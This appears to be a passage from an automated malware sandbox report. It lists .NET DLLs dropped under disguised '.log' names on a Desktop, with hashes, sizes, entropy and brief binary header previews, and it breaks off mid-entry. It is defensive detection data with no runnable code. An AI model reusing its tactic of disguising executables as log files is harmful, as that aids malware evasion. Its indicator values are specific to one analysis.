                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):33280
                                                                  Entropy (8bit):5.634433516692816
                                                                  Encrypted:false
                                                                  SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                  MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                                  SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                                  SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                  SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\NWAOYYym.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):69632
                                                                  Entropy (8bit):5.932541123129161
                                                                  Encrypted:false
                                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                  C:\Users\user\Desktop\NnHgmtso.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):342528
                                                                  Entropy (8bit):6.170134230759619
                                                                  Encrypted:false
                                                                  SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                  MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                  SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                  SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                  SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\NoRyKQDH.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):40448
                                                                  Entropy (8bit):5.7028690200758465
                                                                  Encrypted:false
                                                                  SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                  MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                  SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                  SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                  SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\NtxFrmGq.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):69632
                                                                  Entropy (8bit):5.932541123129161
                                                                  Encrypted:false
                                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                  C:\Users\user\Desktop\OQPyFqpt.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):22016
                                                                  Entropy (8bit):5.41854385721431
                                                                  Encrypted:false
                                                                  SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                                  MD5:BBDE7073BAAC996447F749992D65FFBA
                                                                  SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                                  SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                                  SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\PEYPdPrA.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):34304
                                                                  Entropy (8bit):5.618776214605176
                                                                  Encrypted:false
                                                                  SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                  MD5:9B25959D6CD6097C0EF36D2496876249
                                                                  SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                  SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                  SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\PGiZSoip.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):22016
                                                                  Entropy (8bit):5.41854385721431
                                                                  Encrypted:false
                                                                  SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                                  MD5:BBDE7073BAAC996447F749992D65FFBA
                                                                  SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                                  SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                                  SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\PPFZCaBl.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):342528
                                                                  Entropy (8bit):6.170134230759619
                                                                  Encrypted:false
                                                                  SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                  MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                  SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                  SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                  SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\PWNGLdXl.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):342528
                                                                  Entropy (8bit):6.170134230759619
                                                                  Encrypted:false
                                                                  SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                  MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                  SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                  SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                  SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\PXvpYVwJ.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):9728
                                                                  Entropy (8bit):5.0168086460579095
                                                                  Encrypted:false
                                                                  SSDEEP:96:b2+4Af/qPl98sgn8VenjzRR0xXzhZ7BiCTUk9v2G6/7jK6XsBG7hWuP9LfqpW0RQ:gCU8XKb7BDUieGi3jcBgLyB+b
                                                                  MD5:69546E20149FE5633BCBA413DC3DC964
                                                                  SHA1:29FEB42AB8B563FAFACFD27FAE48D4019A4CBCC2
                                                                  SHA-256:B48CA16B9BA2B44BF13051705B8E12D587D80262F57F7B2595AD1DD7854A86C6
                                                                  SHA-512:90D5F6C334B8064ED6DD002B03C57CEBBFAC1620D6CB2B79103DB0369D3A4FD82DB092E675F387AB0BDFE20303D9AC37F4E150896FC333E6F83B00269F012236
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.................=... ...@....... ....................................@..................................<..W....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B.................=......H.......<&.............................................................................................................*V...}................*.*.0..C.......(....o.......(....(....o.......(....s......(...........o....o.....*..0..'.......s.......(....o.....o........,..o......*..................0.............{........&.r...p.{....r;..p(....}.....s....}.....{........[.{.....{....o....(....s....rQ..po.....{.....{....o....(....s....ra..po......{....s....}.....{..........+.{.....{..

                                                                  C:\Users\user\Desktop\QLzxKisH.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):22016
                                                                  Entropy (8bit):5.41854385721431
                                                                  Encrypted:false
                                                                  SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                                  MD5:BBDE7073BAAC996447F749992D65FFBA
                                                                  SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                                  SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                                  SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\QvOHgixC.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):34304
                                                                  Entropy (8bit):5.618776214605176
                                                                  Encrypted:false
                                                                  SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                  MD5:9B25959D6CD6097C0EF36D2496876249
                                                                  SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                  SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                  SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\RKwhQDGz.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):46592
                                                                  Entropy (8bit):5.870612048031897
                                                                  Encrypted:false
                                                                  SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                  MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                  SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                  SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                  SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\RjAOsfOs.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):126976
                                                                  Entropy (8bit):6.057993947082715
                                                                  Encrypted:false
                                                                  SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                  MD5:16B480082780CC1D8C23FB05468F64E7
                                                                  SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                  SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                                  SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                                                  C:\Users\user\Desktop\SzxHEkUn.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):69632
                                                                  Entropy (8bit):5.932541123129161
                                                                  Encrypted:false
                                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                  C:\Users\user\Desktop\THYplDVu.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):33792
                                                                  Entropy (8bit):5.541771649974822
                                                                  Encrypted:false
                                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\TbmXCvgb.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):23552
                                                                  Entropy (8bit):5.519109060441589
                                                                  Encrypted:false
                                                                  SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                  MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                  SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                  SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                  SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\TxYPZkji.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):50176
                                                                  Entropy (8bit):5.723168999026349
                                                                  Encrypted:false
                                                                  SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                  MD5:2E116FC64103D0F0CF47890FD571561E
                                                                  SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                  SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                  SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\UAZgkvhu.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):85504
                                                                  Entropy (8bit):5.8769270258874755
                                                                  Encrypted:false
                                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                  C:\Users\user\Desktop\UUoNBnsb.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):50176
                                                                  Entropy (8bit):5.723168999026349
                                                                  Encrypted:false
